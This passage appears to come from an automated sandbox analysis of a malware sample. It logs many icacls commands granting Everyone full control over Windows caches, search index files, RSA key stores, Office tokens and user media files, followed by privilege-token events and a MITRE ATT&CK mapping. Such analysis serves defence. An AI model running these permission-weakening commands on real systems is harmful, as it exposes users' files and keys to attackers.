  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1088
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6F95B335-B27B-43AB-99B0-FE819F4F3284}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73B1DD16-5F6E-4703-817D-F411AA517EC7}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{A9642826-38E6-4A6F-A253-1839AB5002E3}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q
  2⤵
  PID:1592
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1520
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1592
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1520
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:852
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q
  2⤵
  PID:328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:796
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q
  2⤵
  PID:1076
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\AddGroup.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\AssertNew.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:1920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BackupTrace.tif /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BlockWait.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ClearWait.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompareSwitch.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConfirmSet.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertGroup.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertToPublish.eps /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ConvertToRequest.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DebugResize.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ExpandDisconnect.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InstallLock.cr2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\InvokeUse.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:1568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinTrace.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:828
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MeasureDisable.cr2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MergeApprove.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\OutUnlock.svgz /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PopShow.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PopUnpublish.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RemoveGrant.eps /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RequestEnable.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:1964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RequestGrant.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:2012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ResolveRedo.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:1496
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeEdit.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnprotectBackup.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnregisterUninstall.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WaitConvert.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2004
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WatchPing.tiff /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1324
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\CloseLock.aiff /grant Everyone:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConfirmHide.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertComplete.kix /grant Everyone:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertToRestart.rm /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DenyReceive.wav /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\EnableSearch.css /grant Everyone:F /T /C /Q
  2⤵
  PID:1584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ExitDebug.xlsm /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\GroupAssert.jpeg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\HideDisconnect.mov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:944
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\InstallRestore.png /grant Everyone:F /T /C /Q
  2⤵
  PID:480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\MergeUndo.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:1776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\MountUnregister.jpeg /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PopRestore.mht /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PublishCompress.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:1864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RestartExpand.pdf /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RestartPing.vbs /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:884
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveDebug.dib /grant Everyone:F /T /C /Q
  2⤵
  PID:1308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveExport.wax /grant Everyone:F /T /C /Q
  2⤵
  PID:1488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StartRemove.mov /grant Everyone:F /T /C /Q
  2⤵
  PID:564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\TraceResume.mpe /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UndoAssert.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UnregisterBlock.m4a /grant Everyone:F /T /C /Q
  2⤵
  PID:1760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WatchBackup.pptx /grant Everyone:F /T /C /Q
  2⤵
  PID:1764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q
  2⤵
  PID:268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1792
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1692
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q
  2⤵
  PID:568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:272
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1363905297-3790925001018146473-947902720-32676072-2698771831545134349682734478"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-192654003319468685851016773754-21290101921164816781-1939861613-1155751753748307847"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9179640559562302841379109074425107959-10032419991167373045688934954-263595551"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-212522866-590402947-207282744-304362794-55179482218908590081316156709-511953520"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-239055415-813671708-89462619821972863920816823750839792677005711-1344750021"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "417453626140994921-1959722272-67051847216837455951574935194-985073622165024806"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

